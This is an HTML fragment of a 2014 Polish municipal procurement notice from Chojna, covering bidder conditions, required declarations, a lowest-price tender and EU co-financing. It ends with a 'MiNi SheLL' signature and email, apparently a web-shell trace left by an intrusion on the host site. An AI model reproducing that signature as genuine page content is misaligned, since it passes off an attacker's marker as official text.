<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w zakresie .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w  tym zakresie.
Zamawiający uzna warunek za spełniony i dokona oceny spełnienia warunków udziału w postępowaniu  w oparciu o  oświadczenie z art. 22 ust. 1 złożone przez wykonawcę w niniejszym postępowaniu oraz złożeniu Oświadczenia o posiadaniu stosownych uprawnień do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w  tym zakresie.
Zamawiający uzna warunek za spełniony i dokona oceny spełnienia warunków udziału w postępowaniu  w oparciu o  oświadczenie z art. 22 ust. 1 złożone przez wykonawcę w niniejszym postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o podwykonawcach.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.chojna.pl.zakładka: zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chojnie
ul.Jagiellońska 4
74-500 Chojna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2014 godzina 09:30, miejsce: Urząd Miejski w Chojnie
ul.Jagiellońska 4
74-500 Chojna
pok.12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Projekt  Pomóż mi, a będę miał równy start Nr wniosku WND - POKL.09.01.01-32-010/13, Nr Umowy UDA - POKL.09.01.01-32-010/13-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com